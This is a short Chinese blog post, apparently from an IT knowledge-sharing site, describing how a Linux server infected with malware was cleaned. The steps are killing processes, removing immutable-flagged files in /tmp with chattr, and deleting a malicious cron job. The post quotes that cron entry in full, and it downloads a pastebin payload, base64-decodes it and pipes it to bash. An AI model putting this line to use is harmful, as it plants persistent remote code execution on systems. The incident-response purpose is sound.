大家好,欢迎来到IT知识分享网。
1.楔子
2. 定位问题
3. 解决问题
3. 1KILL掉进程
3. 2 删掉病毒文件
于是我想到病毒的可执行文件没有删除,病毒文件在/tmp下,比如thisxxs kworkerds等文件都是病毒文件。如下:
于是执行 : rm -rf /tmp/*删除掉所有的病毒文件。
但是执行的过程中发现一些文件不能被删除,提示没有权限,什么???root用户竟然会有没有权限?我惊呆了,后仔细分析发先了问题之所在,原来文件自带i属性,难怪删不了。
i :这个i可就很厉害了。它可以让一个文件“不能被删除、改名,设置连接也无法写入或添加据。” 对于系统安全性有相当大的 帮助。只有root能设置此属性。 通常系统管理员有能力判断这个文件是否可以被删除。 详细参考:https://blog.csdn.net/JJuStudent/article/details/ 于是执行chattr -i thisxxs去掉i属性,之后就可完美删除掉。
3. 3 清除定时任务
病毒进程会过一段时间重新启动,于是想到有定时任务,执行crontab -l发现果然有定时任务如下:
定时任务内容如下:
* /23 * * * * (curl -fsSL https://pastebin.com/raw/Gw7mywhC || wget -q-O- https://pastebin.com/raw/Gw7mywhC)|base64 -d |/bin/bash 在执行crontab -r或者crontab -e删除和修改定时任务时,发现和上面一样,有i属性,不能操作。去掉i属性后即可删除掉定时任务。
定时任务呗删除干净:
3. 4 结果
4.结论
免责声明:本站所有文章内容,图片,视频等均是来源于用户投稿和互联网及文摘转载整编而成,不代表本站观点,不承担相关法律责任。其著作权各归其原作者或其出版社所有。如发现本站有涉嫌抄袭侵权/违法违规的内容,侵犯到您的权益,请在线联系站长,一经查实,本站将立刻删除。 本文来自网络,若有侵权,请联系删除,如若转载,请注明出处:https://haidsoft.com/117833.html
